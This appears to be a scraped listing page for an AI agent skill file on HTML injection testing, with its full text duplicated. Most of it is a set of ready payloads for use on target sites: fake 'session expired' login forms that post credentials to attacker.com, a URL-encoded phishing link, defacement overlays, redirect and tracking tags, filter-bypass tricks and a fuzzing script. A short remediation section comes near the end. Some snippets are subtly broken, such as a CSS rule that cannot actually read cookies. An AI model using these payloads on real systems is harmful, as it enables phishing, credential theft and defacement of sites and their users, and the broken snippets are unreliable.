html-injection-testing

davila7/html-injection-testing

Security

19,892

3 installs

About

SKILL.md

html-injection-testing

davila7/html-injection-testing

Security

19,892

3 installs

About

This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection...

SKILL.md

HTML Injection Testing

Purpose

Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.

Prerequisites

Required Tools

Web browser with developer tools
Burp Suite or OWASP ZAP
Tamper Data or similar proxy
cURL for testing payloads

Required Knowledge

HTML fundamentals
HTTP request/response structure
Web application input handling
Difference between HTML injection and XSS

Outputs and Deliverables

Vulnerability Report - Identified injection points
Exploitation Proof - Demonstrated content manipulation
Impact Assessment - Potential phishing and defacement risks
Remediation Guidance - Input validation recommendations

Core Workflow

Phase 1: Understanding HTML Injection

HTML injection occurs when user input is reflected in web pages without proper sanitization:

<!-- Vulnerable code example -->
<div>
    Welcome, <?php echo $_GET['name']; ?>
</div>

<!-- Attack input -->
?name=<h1>Injected Content</h1>

<!-- Rendered output -->
<div>
    Welcome, <h1>Injected Content</h1>
</div>

Key differences from XSS:

HTML injection: Only HTML tags are rendered
XSS: JavaScript code is executed
HTML injection is often stepping stone to XSS

Attack goals:

Modify website appearance (defacement)
Create fake login forms (phishing)
Inject malicious links
Display misleading content

Phase 2: Identifying Injection Points

Map application for potential injection surfaces:

1. Search bars and search results
2. Comment sections
3. User profile fields
4. Contact forms and feedback
5. Registration forms
6. URL parameters reflected on page
7. Error messages
8. Page titles and headers
9. Hidden form fields
10. Cookie values reflected on page

Common vulnerable parameters:

?name=
?user=
?search=
?query=
?message=
?title=
?content=
?redirect=
?url=
?page=

Phase 3: Basic HTML Injection Testing

Test with simple HTML tags:

<!-- Basic text formatting -->
<h1>Test Injection</h1>
<b>Bold Text</b>
<i>Italic Text</i>
<u>Underlined Text</u>
<font color="red">Red Text</font>

<!-- Structural elements -->
<div style="background:red;color:white;padding:10px">Injected DIV</div>
<p>Injected paragraph</p>
<br><br><br>Line breaks

<!-- Links -->
<a href="http://attacker.com">Click Here</a>
<a href="http://attacker.com">Legitimate Link</a>

<!-- Images -->
<img src="http://attacker.com/image.png">
<img src="x" onerror="alert(1)">  <!-- XSS attempt -->

Testing workflow:

# Test basic injection
curl "http://target.com/search?q=<h1>Test</h1>"

# Check if HTML renders in response
curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold"

# Test in URL-encoded form
curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"

Phase 4: Types of HTML Injection

Stored HTML Injection

Payload persists in database:

<!-- Profile bio injection -->
Name: John Doe
Bio: <div style="position:absolute;top:0;left:0;width:100%;height:100%;background:white;">
     <h1>Site Under Maintenance</h1>
     <p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p>
     </div>

<!-- Comment injection -->
Great article!
<form action="http://attacker.com/steal" method="POST">
    <input name="username" placeholder="Session expired. Enter username:">
    <input name="password" type="password" placeholder="Password:">
    <input type="submit" value="Login">
</form>

Reflected GET Injection

Payload in URL parameters:

<!-- URL injection -->
http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal">

<!-- Search result injection -->
http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee>

Reflected POST Injection

Payload in POST data:

# POST injection test
curl -X POST -d "comment=<div style='color:red'>Malicious Content</div>" \
     http://target.com/submit

# Form field injection
curl -X POST -d "name=<script>alert(1)</script>&email=test@test.com" \
     http://target.com/register

URL-Based Injection

Inject into displayed URLs:

<!-- If URL is displayed on page -->
http://target.com/page/<h1>Injected</h1>

<!-- Path-based injection -->
http://target.com/users/<img src=x>/profile

Phase 5: Phishing Attack Construction

Create convincing phishing forms:

<!-- Fake login form overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
            background:white;z-index:9999;padding:50px;">
    <h2>Session Expired</h2>
    <p>Your session has expired. Please log in again.</p>
    <form action="http://attacker.com/capture" method="POST">
        <label>Username:</label><br>
        <input type="text" name="username" style="width:200px;"><br><br>
        <label>Password:</label><br>
        <input type="password" name="password" style="width:200px;"><br><br>
        <input type="submit" value="Login">
    </form>
</div>

<!-- Hidden credential stealer -->
<style>
    input { background: url('http://attacker.com/log?data=') }
</style>
<form action="http://attacker.com/steal" method="POST">
    <input name="user" placeholder="Verify your username">
    <input name="pass" type="password" placeholder="Verify your password">
    <button>Verify</button>
</form>

URL-encoded phishing link:

http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cinput%20name%3D%22user%22%20placeholder%3D%22Username%22%3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E%3Cbutton%3ELogin%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fdiv%3E

Phase 6: Defacement Payloads

Website appearance manipulation:

<!-- Full page overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
            background:#000;color:#0f0;z-index:9999;
            display:flex;justify-content:center;align-items:center;">
    <h1>HACKED BY SECURITY TESTER</h1>
</div>

<!-- Content replacement -->
<style>body{display:none}</style>
<body style="display:block !important">
    <h1>This site has been compromised</h1>
</body>

<!-- Image injection -->
<img src="http://attacker.com/defaced.jpg" 
     style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999">

<!-- Marquee injection (visible movement) -->
<marquee behavior="alternate" style="font-size:50px;color:red;">
    SECURITY VULNERABILITY DETECTED
</marquee>

Phase 7: Advanced Injection Techniques

CSS Injection

<!-- Style injection -->
<style>
    body { background: url('http://attacker.com/track?cookie='+document.cookie) }
    .content { display: none }
    .fake-content { display: block }
</style>

<!-- Inline style injection -->
<div style="background:url('http://attacker.com/log')">Content</div>

Meta Tag Injection

<!-- Redirect via meta refresh -->
<meta http-equiv="refresh" content="0;url=http://attacker.com/phish">

<!-- CSP bypass attempt -->
<meta http-equiv="Content-Security-Policy" content="default-src *">

Form Action Override

<!-- Hijack existing form -->
<form action="http://attacker.com/steal">

<!-- If form already exists, add input -->
<input type="hidden" name="extra" value="data">
</form>

iframe Injection

<!-- Embed external content -->
<iframe src="http://attacker.com/malicious" width="100%" height="500"></iframe>

<!-- Invisible tracking iframe -->
<iframe src="http://attacker.com/track" style="display:none"></iframe>

Phase 8: Bypass Techniques

Evade basic filters:

<!-- Case variations -->
<H1>Test</H1>
<ScRiPt>alert(1)</ScRiPt>

<!-- Encoding variations -->
&#60;h1&#62;Encoded&#60;/h1&#62;
%3Ch1%3EURL%20Encoded%3C%2Fh1%3E

<!-- Tag splitting -->
<h
1>Split Tag</h1>

<!-- Null bytes -->
<h1%00>Null Byte</h1>

<!-- Double encoding -->
%253Ch1%253EDouble%2520Encoded%253C%252Fh1%253E

<!-- Unicode encoding -->
\u003ch1\u003eUnicode\u003c/h1\u003e

<!-- Attribute-based -->
<div onmouseover="alert(1)">Hover me</div>
<img src=x onerror=alert(1)>

Phase 9: Automated Testing

Using Burp Suite

1. Capture request with potential injection point
2. Send to Intruder
3. Mark parameter value as payload position
4. Load HTML injection wordlist
5. Start attack
6. Filter responses for rendered HTML
7. Manually verify successful injections

Using OWASP ZAP

1. Spider the target application
2. Active Scan with HTML injection rules
3. Review Alerts for injection findings
4. Validate findings manually

Custom Fuzzing Script

#!/usr/bin/env python3
import requests
import urllib.parse

target = "http://target.com/search"
param = "q"

payloads = [
    "<h1>Test</h1>",
    "<b>Bold</b>",
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<a href='http://evil.com'>Click</a>",
    "<div style='color:red'>Styled</div>",
    "<marquee>Moving</marquee>",
    "<iframe src='http://evil.com'></iframe>",
]

for payload in payloads:
    encoded = urllib.parse.quote(payload)
    url = f"{target}?{param}={encoded}"
    
    try:
        response = requests.get(url, timeout=5)
        if payload.lower() in response.text.lower():
            print(f"[+] Possible injection: {payload}")
        elif "<h1>" in response.text or "<b>" in response.text:
            print(f"[?] Partial reflection: {payload}")
    except Exception as e:
        print(f"[-] Error: {e}")

Phase 10: Prevention and Remediation

Secure coding practices:

// PHP: Escape output
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

// PHP: Strip tags
echo strip_tags($user_input);

// PHP: Allow specific tags only
echo strip_tags($user_input, '<p><b><i>');

# Python: HTML escape
from html import escape
safe_output = escape(user_input)

# Python Flask: Auto-escaping
{{ user_input }}  # Jinja2 escapes by default
{{ user_input | safe }}  # Marks as safe (dangerous!)

// JavaScript: Text content (safe)
element.textContent = userInput;

// JavaScript: innerHTML (dangerous!)
element.innerHTML = userInput;  // Vulnerable!

// JavaScript: Sanitize
const clean = DOMPurify.sanitize(userInput);
element.innerHTML = clean;

Server-side protections:

Input validation (whitelist allowed characters)
Output encoding (context-aware escaping)
Content Security Policy (CSP) headers
Web Application Firewall (WAF) rules

Quick Reference

Common Test Payloads

Payload	Purpose
`<h1>Test</h1>`	Basic rendering test
`<b>Bold</b>`	Simple formatting
`<a href="evil.com">Link</a>`	Link injection
`<img src=x>`	Image tag test
`<div style="color:red">`	Style injection
`<form action="evil.com">`	Form hijacking

Injection Contexts

Context	Test Approach
URL parameter	`?param=<h1>test</h1>`
Form field	POST with HTML payload
Cookie value	Inject via document.cookie
HTTP header	Inject in Referer/User-Agent
File upload	HTML file with malicious content

Encoding Types

Type	Example
URL encoding	`%3Ch1%3E` = `<h1>`
HTML entities	`<h1>` = `<h1>`
Double encoding	`%253C` = `<`
Unicode	`\u003c` = `<`

Constraints and Limitations

Attack Limitations

Modern browsers may sanitize some injections
CSP can prevent inline styles and scripts
WAFs may block common payloads
Some applications escape output properly

Testing Considerations

Distinguish between HTML injection and XSS
Verify visual impact in browser
Test in multiple browsers
Check for stored vs reflected

Severity Assessment

Lower severity than XSS (no script execution)
Higher impact when combined with phishing
Consider defacement/reputation damage
Evaluate credential theft potential

Troubleshooting

Issue	Solutions
HTML not rendering	Check if output HTML-encoded; try encoding variations; verify HTML context
Payload stripped	Use encoding variations; try tag splitting; test null bytes; nested tags
XSS not working (HTML only)	JS filtered but HTML allowed; leverage phishing forms, meta refresh redirects

About

SKILL.md

About

This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection...

SKILL.md

HTML Injection Testing

Purpose

Prerequisites

Required Tools

Web browser with developer tools
Burp Suite or OWASP ZAP
Tamper Data or similar proxy
cURL for testing payloads

Required Knowledge

HTML fundamentals
HTTP request/response structure
Web application input handling
Difference between HTML injection and XSS

Outputs and Deliverables

Vulnerability Report - Identified injection points
Exploitation Proof - Demonstrated content manipulation
Impact Assessment - Potential phishing and defacement risks
Remediation Guidance - Input validation recommendations

Core Workflow

Phase 1: Understanding HTML Injection

HTML injection occurs when user input is reflected in web pages without proper sanitization:

<!-- Vulnerable code example -->
<div>
    Welcome, <?php echo $_GET['name']; ?>
</div>

<!-- Attack input -->
?name=<h1>Injected Content</h1>

<!-- Rendered output -->
<div>
    Welcome, <h1>Injected Content</h1>
</div>

Key differences from XSS:

HTML injection: Only HTML tags are rendered
XSS: JavaScript code is executed
HTML injection is often stepping stone to XSS

Attack goals:

Modify website appearance (defacement)
Create fake login forms (phishing)
Inject malicious links
Display misleading content

Phase 2: Identifying Injection Points

Map application for potential injection surfaces:

1. Search bars and search results
2. Comment sections
3. User profile fields
4. Contact forms and feedback
5. Registration forms
6. URL parameters reflected on page
7. Error messages
8. Page titles and headers
9. Hidden form fields
10. Cookie values reflected on page

Common vulnerable parameters:

?name=
?user=
?search=
?query=
?message=
?title=
?content=
?redirect=
?url=
?page=

Phase 3: Basic HTML Injection Testing

Test with simple HTML tags:

<!-- Basic text formatting -->
<h1>Test Injection</h1>
<b>Bold Text</b>
<i>Italic Text</i>
<u>Underlined Text</u>
<font color="red">Red Text</font>

<!-- Structural elements -->
<div style="background:red;color:white;padding:10px">Injected DIV</div>
<p>Injected paragraph</p>
<br><br><br>Line breaks

<!-- Links -->
<a href="http://attacker.com">Click Here</a>
<a href="http://attacker.com">Legitimate Link</a>

<!-- Images -->
<img src="http://attacker.com/image.png">
<img src="x" onerror="alert(1)">  <!-- XSS attempt -->

Testing workflow:

# Test basic injection
curl "http://target.com/search?q=<h1>Test</h1>"

# Check if HTML renders in response
curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold"

# Test in URL-encoded form
curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"

Phase 4: Types of HTML Injection

Stored HTML Injection

Payload persists in database:

<!-- Profile bio injection -->
Name: John Doe
Bio: <div style="position:absolute;top:0;left:0;width:100%;height:100%;background:white;">
     <h1>Site Under Maintenance</h1>
     <p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p>
     </div>

<!-- Comment injection -->
Great article!
<form action="http://attacker.com/steal" method="POST">
    <input name="username" placeholder="Session expired. Enter username:">
    <input name="password" type="password" placeholder="Password:">
    <input type="submit" value="Login">
</form>

Reflected GET Injection

Payload in URL parameters:

<!-- URL injection -->
http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal">

<!-- Search result injection -->
http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee>

Reflected POST Injection

Payload in POST data:

# POST injection test
curl -X POST -d "comment=<div style='color:red'>Malicious Content</div>" \
     http://target.com/submit

# Form field injection
curl -X POST -d "name=<script>alert(1)</script>&email=test@test.com" \
     http://target.com/register

URL-Based Injection

Inject into displayed URLs:

<!-- If URL is displayed on page -->
http://target.com/page/<h1>Injected</h1>

<!-- Path-based injection -->
http://target.com/users/<img src=x>/profile

Phase 5: Phishing Attack Construction

Create convincing phishing forms:

<!-- Fake login form overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
            background:white;z-index:9999;padding:50px;">
    <h2>Session Expired</h2>
    <p>Your session has expired. Please log in again.</p>
    <form action="http://attacker.com/capture" method="POST">
        <label>Username:</label><br>
        <input type="text" name="username" style="width:200px;"><br><br>
        <label>Password:</label><br>
        <input type="password" name="password" style="width:200px;"><br><br>
        <input type="submit" value="Login">
    </form>
</div>

<!-- Hidden credential stealer -->
<style>
    input { background: url('http://attacker.com/log?data=') }
</style>
<form action="http://attacker.com/steal" method="POST">
    <input name="user" placeholder="Verify your username">
    <input name="pass" type="password" placeholder="Verify your password">
    <button>Verify</button>
</form>

URL-encoded phishing link:

http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cinput%20name%3D%22user%22%20placeholder%3D%22Username%22%3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E%3Cbutton%3ELogin%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fdiv%3E

Phase 6: Defacement Payloads

Website appearance manipulation:

<!-- Full page overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
            background:#000;color:#0f0;z-index:9999;
            display:flex;justify-content:center;align-items:center;">
    <h1>HACKED BY SECURITY TESTER</h1>
</div>

<!-- Content replacement -->
<style>body{display:none}</style>
<body style="display:block !important">
    <h1>This site has been compromised</h1>
</body>

<!-- Image injection -->
<img src="http://attacker.com/defaced.jpg" 
     style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999">

<!-- Marquee injection (visible movement) -->
<marquee behavior="alternate" style="font-size:50px;color:red;">
    SECURITY VULNERABILITY DETECTED
</marquee>

Phase 7: Advanced Injection Techniques

CSS Injection

<!-- Style injection -->
<style>
    body { background: url('http://attacker.com/track?cookie='+document.cookie) }
    .content { display: none }
    .fake-content { display: block }
</style>

<!-- Inline style injection -->
<div style="background:url('http://attacker.com/log')">Content</div>

Meta Tag Injection

<!-- Redirect via meta refresh -->
<meta http-equiv="refresh" content="0;url=http://attacker.com/phish">

<!-- CSP bypass attempt -->
<meta http-equiv="Content-Security-Policy" content="default-src *">

Form Action Override

<!-- Hijack existing form -->
<form action="http://attacker.com/steal">

<!-- If form already exists, add input -->
<input type="hidden" name="extra" value="data">
</form>

iframe Injection

<!-- Embed external content -->
<iframe src="http://attacker.com/malicious" width="100%" height="500"></iframe>

<!-- Invisible tracking iframe -->
<iframe src="http://attacker.com/track" style="display:none"></iframe>

Phase 8: Bypass Techniques

Evade basic filters:

<!-- Case variations -->
<H1>Test</H1>
<ScRiPt>alert(1)</ScRiPt>

<!-- Encoding variations -->
&#60;h1&#62;Encoded&#60;/h1&#62;
%3Ch1%3EURL%20Encoded%3C%2Fh1%3E

<!-- Tag splitting -->
<h
1>Split Tag</h1>

<!-- Null bytes -->
<h1%00>Null Byte</h1>

<!-- Double encoding -->
%253Ch1%253EDouble%2520Encoded%253C%252Fh1%253E

<!-- Unicode encoding -->
\u003ch1\u003eUnicode\u003c/h1\u003e

<!-- Attribute-based -->
<div onmouseover="alert(1)">Hover me</div>
<img src=x onerror=alert(1)>

Phase 9: Automated Testing

Using Burp Suite

1. Capture request with potential injection point
2. Send to Intruder
3. Mark parameter value as payload position
4. Load HTML injection wordlist
5. Start attack
6. Filter responses for rendered HTML
7. Manually verify successful injections

Using OWASP ZAP

1. Spider the target application
2. Active Scan with HTML injection rules
3. Review Alerts for injection findings
4. Validate findings manually

Custom Fuzzing Script

#!/usr/bin/env python3
import requests
import urllib.parse

target = "http://target.com/search"
param = "q"

payloads = [
    "<h1>Test</h1>",
    "<b>Bold</b>",
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<a href='http://evil.com'>Click</a>",
    "<div style='color:red'>Styled</div>",
    "<marquee>Moving</marquee>",
    "<iframe src='http://evil.com'></iframe>",
]

for payload in payloads:
    encoded = urllib.parse.quote(payload)
    url = f"{target}?{param}={encoded}"
    
    try:
        response = requests.get(url, timeout=5)
        if payload.lower() in response.text.lower():
            print(f"[+] Possible injection: {payload}")
        elif "<h1>" in response.text or "<b>" in response.text:
            print(f"[?] Partial reflection: {payload}")
    except Exception as e:
        print(f"[-] Error: {e}")

Phase 10: Prevention and Remediation

Secure coding practices:

// PHP: Escape output
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

// PHP: Strip tags
echo strip_tags($user_input);

// PHP: Allow specific tags only
echo strip_tags($user_input, '<p><b><i>');

# Python: HTML escape
from html import escape
safe_output = escape(user_input)

# Python Flask: Auto-escaping
{{ user_input }}  # Jinja2 escapes by default
{{ user_input | safe }}  # Marks as safe (dangerous!)

// JavaScript: Text content (safe)
element.textContent = userInput;

// JavaScript: innerHTML (dangerous!)
element.innerHTML = userInput;  // Vulnerable!

// JavaScript: Sanitize
const clean = DOMPurify.sanitize(userInput);
element.innerHTML = clean;

Server-side protections:

Input validation (whitelist allowed characters)
Output encoding (context-aware escaping)
Content Security Policy (CSP) headers
Web Application Firewall (WAF) rules

Quick Reference

Common Test Payloads

Payload	Purpose
`<h1>Test</h1>`	Basic rendering test
`<b>Bold</b>`	Simple formatting
`<a href="evil.com">Link</a>`	Link injection
`<img src=x>`	Image tag test
`<div style="color:red">`	Style injection
`<form action="evil.com">`	Form hijacking

Injection Contexts

Context	Test Approach
URL parameter	`?param=<h1>test</h1>`
Form field	POST with HTML payload
Cookie value	Inject via document.cookie
HTTP header	Inject in Referer/User-Agent
File upload	HTML file with malicious content

Encoding Types

Type	Example
URL encoding	`%3Ch1%3E` = `<h1>`
HTML entities	`<h1>` = `<h1>`
Double encoding	`%253C` = `<`
Unicode	`\u003c` = `<`

Constraints and Limitations

Attack Limitations

Modern browsers may sanitize some injections
CSP can prevent inline styles and scripts
WAFs may block common payloads
Some applications escape output properly

Testing Considerations

Distinguish between HTML injection and XSS
Verify visual impact in browser
Test in multiple browsers
Check for stored vs reflected

Severity Assessment

Lower severity than XSS (no script execution)
Higher impact when combined with phishing
Consider defacement/reputation damage
Evaluate credential theft potential

Troubleshooting

Issue	Solutions
HTML not rendering	Check if output HTML-encoded; try encoding variations; verify HTML context
Payload stripped	Use encoding variations; try tag splitting; test null bytes; nested tags
XSS not working (HTML only)	JS filtered but HTML allowed; leverage phishing forms, meta refresh redirects